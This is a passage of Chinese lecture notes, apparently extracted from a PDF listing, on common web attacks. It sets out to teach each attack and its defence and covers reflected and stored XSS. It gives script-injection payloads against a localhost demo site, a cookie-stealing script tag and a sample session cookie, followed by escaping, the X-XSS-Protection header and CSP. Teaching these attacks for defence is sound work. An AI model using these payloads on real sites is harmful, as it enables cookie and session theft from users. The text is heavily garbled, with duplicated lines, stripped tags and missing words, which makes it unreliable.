常见攻击瑞客吾爱课堂.pdfVIP

常⻅Web攻击

⼀、课前准备

⼀、课堂主题

⼆、课堂⽬标

掌握XSS(实施+防御)

掌握CSRF(实施+防御)

掌握点击劫持(实施+防御)

掌握SQL注⼊(实施+防御)

掌握OS注⼊(实施+防御)

了解请求劫持

了解DDOS

四、知识要点

1、XSS

CrossSiteScripting

跨站脚本攻击

XSS(Cross-SiteScripting)，跨站脚本攻击，因为缩写和

XSS(Cross-SiteScripting)，跨站脚本攻击因为缩写和CSS重叠，所以只能叫XSS。跨站脚本攻

击是指通过存在安全漏洞的Web⽹站注册⽤户的浏览器内运⾏⾮法的⾮本站点

击是指通过存在安全漏洞的Web⽹站注册⽤户的浏览器内运⾏⾮法的⾮本站点HTML标签或

JavaScript进⾏的⼀种攻击。

进⾏的⼀种攻击。

跨站脚本攻击有可能造成以下影响:

跨站脚本攻击有可能造成以下影响:

利⽤虚假输⼊表单骗取⽤户个⼈信息。利⽤虚假输⼊表单骗取⽤户个⼈信息。

利⽤脚本窃取⽤户的Cookie值，被害者在不知情的情况下，帮助攻击者发送恶意请求。

显示伪造的⽂章或图⽚。

XSS攻击分类

反射型-url参数直接注⼊

//普通

http://localhost:3000/?from=china

//alert尝试

http://localhost:3000/?from=scriptalert(3)/script

//获取

scriptsrc=

/script

//短

//⼊chrome

document.kaikeba:sess=eyJ1c2VybmFtZSI6Imxhb3dhbmciLCJfZXhwaXJlIjoxNTUz

NTY1MDAxODYxLCJfbWF4QWdlIjo4NjQwMDAwMH0=

型-到DB后时注⼊

//评论

scriptalert(1)/script

//跨站注⼊

我来了scriptsrc/script

/script

XSS的危害-Scripting能⼲啥就能⼲啥能⼲啥就能⼲啥

获取⻚⾯数据

获取s

劫持前端逻辑

发送请求

偷取⽹任意数据

偷取⽤户的资料

偷取⽤户的秘偷取⽤户的秘登录态登录态

⽤户

防范⼿

ejs转义⼩知识

%code%⽤于执⾏其中javascript代码；

%code%会对code进⾏html转义；

%-code%将不会进⾏转义

HEAD

ctx.set(X-XSS-Protection,0)//XSS过滤

//scriptalert(3)/script可以但⼀下就不⾏

了

0XSS过滤。

1启⽤XSS过滤（通常浏览器是默认的）。如果检测到跨站脚本览器将清除⻚⾯（删除不

安全的部分）。

1;mode=block启⽤XSS过滤。如果检测到，浏览器将不会清除⻚⾯，⽽是阻⽌⻚⾯加

1;report=(Chromiumonly)

启⽤XSS过滤。如果检测到跨站，浏览器将清除⻚⾯并使⽤CSPreport-uri指令的功

能发送报告。

CSP

内容安全策略(CSP,ContentSecurity)是⼀个附加的安全层，⽤于帮助检测和缓解某

些类型的，包括跨站(XSS)和数据注⼊等攻这些攻击于实现从数据窃取到

⽹